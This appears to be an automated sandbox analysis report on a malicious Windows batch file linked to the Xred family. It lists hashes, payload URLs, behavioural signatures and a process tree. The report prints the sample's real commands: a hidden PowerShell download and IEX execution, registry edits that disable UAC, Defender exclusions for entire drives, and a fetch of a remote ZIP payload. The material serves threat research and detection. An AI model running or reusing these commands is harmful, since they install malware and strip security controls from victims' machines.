Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2024 02:48
Static task
static1
Behavioral task
behavioral1
Sample
b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat
Resource
win10v2004-20241007-en
General
-
Target
b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat
-
Size
41KB
-
MD5
b84568e632497dd5dc2f4ac9f08b783c
-
SHA1
a0a8e9493a356a2c495130da52c5b49c3d82685a
-
SHA256
b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
-
SHA512
e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
-
SSDEEP
96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0
Malware Config
Extracted
https://paste.fo/raw/cdfd23f3b9ad
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe -
Xred family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 2712 powershell.exe -
pid Process 1564 powershell.exe 2712 powershell.exe 3904 powershell.exe 4412 powershell.exe 4524 powershell.exe 2936 powershell.exe 2880 powershell.exe 3992 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation DOCX.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Synaptics.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk ._cache_DOCX.exe -
Executes dropped EXE 6 IoCs
pid Process 3000 DOCX.exe 4752 ._cache_DOCX.exe 2560 Synaptics.exe 1812 ._cache_Synaptics.exe 2908 XVZBZS.exe 4312 XVZBZS.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" DOCX.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGWEKK = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\XVZBZS.exe\"" ._cache_DOCX.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 raw.githubusercontent.com 21 raw.githubusercontent.com -
AutoIT Executable 9 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/1812-376-0x0000000000520000-0x000000000071A000-memory.dmp autoit_exe behavioral2/memory/2908-431-0x00000000005F0000-0x00000000007EA000-memory.dmp autoit_exe behavioral2/memory/4752-432-0x00000000006B0000-0x00000000008AA000-memory.dmp autoit_exe behavioral2/memory/4752-433-0x00000000006B0000-0x00000000008AA000-memory.dmp autoit_exe behavioral2/memory/4752-442-0x00000000006B0000-0x00000000008AA000-memory.dmp autoit_exe behavioral2/memory/4312-452-0x00000000005F0000-0x00000000007EA000-memory.dmp autoit_exe behavioral2/memory/4752-473-0x00000000006B0000-0x00000000008AA000-memory.dmp autoit_exe behavioral2/memory/4752-479-0x00000000006B0000-0x00000000008AA000-memory.dmp autoit_exe behavioral2/memory/4752-481-0x00000000006B0000-0x00000000008AA000-memory.dmp autoit_exe -
resource yara_rule behavioral2/files/0x0008000000023d15-178.dat upx behavioral2/memory/4752-248-0x00000000006B0000-0x00000000008AA000-memory.dmp upx behavioral2/memory/1812-368-0x0000000000520000-0x000000000071A000-memory.dmp upx behavioral2/memory/1812-376-0x0000000000520000-0x000000000071A000-memory.dmp upx behavioral2/memory/2908-429-0x00000000005F0000-0x00000000007EA000-memory.dmp upx behavioral2/memory/2908-431-0x00000000005F0000-0x00000000007EA000-memory.dmp upx behavioral2/memory/4752-432-0x00000000006B0000-0x00000000008AA000-memory.dmp upx behavioral2/memory/4752-433-0x00000000006B0000-0x00000000008AA000-memory.dmp upx behavioral2/memory/4752-442-0x00000000006B0000-0x00000000008AA000-memory.dmp upx behavioral2/memory/4312-452-0x00000000005F0000-0x00000000007EA000-memory.dmp upx behavioral2/memory/4752-473-0x00000000006B0000-0x00000000008AA000-memory.dmp upx behavioral2/memory/4752-479-0x00000000006B0000-0x00000000008AA000-memory.dmp upx behavioral2/memory/4752-481-0x00000000006B0000-0x00000000008AA000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_DOCX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSCript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XVZBZS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XVZBZS.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 1952 timeout.exe 5092 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 12 IoCs
pid Process 3688 taskkill.exe 2504 taskkill.exe 3316 taskkill.exe 3612 taskkill.exe 4392 taskkill.exe 4568 taskkill.exe 1472 taskkill.exe 2260 taskkill.exe 3248 taskkill.exe 4724 taskkill.exe 3436 taskkill.exe 1724 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ DOCX.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 1556 reg.exe 2320 reg.exe 1408 reg.exe 2212 reg.exe 4072 reg.exe 636 reg.exe 208 reg.exe 1628 reg.exe 4392 reg.exe 3840 reg.exe 1708 reg.exe 1904 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\SecurityCenter2 ._cache_DOCX.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2748 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 760 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2712 powershell.exe 2712 powershell.exe 1564 powershell.exe 1564 powershell.exe 4412 powershell.exe 4412 powershell.exe 4524 powershell.exe 4524 powershell.exe 1048 msedge.exe 1048 msedge.exe 2756 msedge.exe 2756 msedge.exe 2936 powershell.exe 2936 powershell.exe 2936 powershell.exe 2880 powershell.exe 2880 powershell.exe 2880 powershell.exe 3992 powershell.exe 3992 powershell.exe 3992 powershell.exe 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 2820 identity_helper.exe 2820 identity_helper.exe 1260 msedge.exe 1260 msedge.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe 4752 ._cache_DOCX.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4752 ._cache_DOCX.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 3904 powershell.exe Token: SeRestorePrivilege 2244 7z.exe Token: 35 2244 7z.exe Token: SeSecurityPrivilege 2244 7z.exe Token: SeSecurityPrivilege 2244 7z.exe Token: SeDebugPrivilege 4568 taskkill.exe Token: SeDebugPrivilege 3688 taskkill.exe Token: SeDebugPrivilege 2504 taskkill.exe Token: SeDebugPrivilege 3316 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 2260 taskkill.exe Token: SeDebugPrivilege 3612 taskkill.exe Token: SeDebugPrivilege 3248 taskkill.exe Token: SeDebugPrivilege 4392 taskkill.exe Token: SeDebugPrivilege 4724 taskkill.exe Token: SeDebugPrivilege 3436 taskkill.exe Token: SeDebugPrivilege 1724 taskkill.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe 2756 msedge.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 760 EXCEL.EXE 760 EXCEL.EXE 760 EXCEL.EXE 760 EXCEL.EXE 760 EXCEL.EXE 760 EXCEL.EXE 760 EXCEL.EXE 760 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 560 wrote to memory of 4828 560 cmd.exe 84 PID 560 wrote to memory of 4828 560 cmd.exe 84 PID 4828 wrote to memory of 2712 4828 cmd.exe 86 PID 4828 wrote to memory of 2712 4828 cmd.exe 86 PID 4828 wrote to memory of 1564 4828 cmd.exe 87 PID 4828 wrote to memory of 1564 4828 cmd.exe 87 PID 1564 wrote to memory of 3852 1564 powershell.exe 88 PID 1564 wrote to memory of 3852 1564 powershell.exe 88 PID 3852 wrote to memory of 4072 3852 cmd.exe 90 PID 3852 wrote to memory of 4072 3852 cmd.exe 90 PID 3852 wrote to memory of 1904 3852 cmd.exe 91 PID 3852 wrote to memory of 1904 3852 cmd.exe 91 PID 3852 wrote to memory of 1556 3852 cmd.exe 92 PID 3852 wrote to memory of 1556 3852 cmd.exe 92 PID 3852 wrote to memory of 1708 3852 cmd.exe 93 PID 3852 wrote to memory of 1708 3852 cmd.exe 93 PID 3852 wrote to memory of 2212 3852 cmd.exe 94 PID 3852 wrote to memory of 2212 3852 cmd.exe 94 PID 3852 wrote to memory of 636 3852 cmd.exe 95 PID 3852 wrote to memory of 636 3852 cmd.exe 95 PID 3852 wrote to memory of 3840 3852 cmd.exe 96 PID 3852 wrote to memory of 3840 3852 cmd.exe 96 PID 3852 wrote to memory of 4392 3852 cmd.exe 97 PID 3852 wrote to memory of 4392 3852 cmd.exe 97 PID 3852 wrote to memory of 1628 3852 cmd.exe 98 PID 3852 wrote to memory of 1628 3852 cmd.exe 98 PID 3852 wrote to memory of 2320 3852 cmd.exe 99 PID 3852 wrote to memory of 2320 3852 cmd.exe 99 PID 3852 wrote to memory of 1408 3852 cmd.exe 100 PID 3852 wrote to memory of 1408 3852 cmd.exe 100 PID 3852 wrote to memory of 208 3852 cmd.exe 101 PID 3852 wrote to memory of 208 3852 cmd.exe 101 PID 3852 wrote to memory of 4412 3852 cmd.exe 102 PID 3852 wrote to memory of 4412 3852 cmd.exe 102 PID 4828 wrote to memory of 2756 4828 cmd.exe 103 PID 4828 wrote to memory of 2756 4828 cmd.exe 103 PID 4828 wrote to memory of 1952 4828 cmd.exe 105 PID 4828 wrote to memory of 1952 4828 cmd.exe 105 PID 2756 wrote to memory of 4220 2756 msedge.exe 106 PID 2756 wrote to memory of 4220 2756 msedge.exe 106 PID 3852 wrote to memory of 4524 3852 cmd.exe 107 PID 3852 wrote to memory of 4524 3852 cmd.exe 107 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108 PID 2756 wrote to memory of 2020 2756 msedge.exe 108
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:4072
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:1904
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1556
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1708
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2212
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:636
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3840
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4392
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1628
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2320
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:1408
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9520d46f8,0x7ff9520d4708,0x7ff9520d47184⤵PID:4220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:24⤵PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:84⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:14⤵PID:4816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:14⤵PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:14⤵PID:3316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6269929522095797884,10735235077190262648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:14⤵PID:3652
-
-
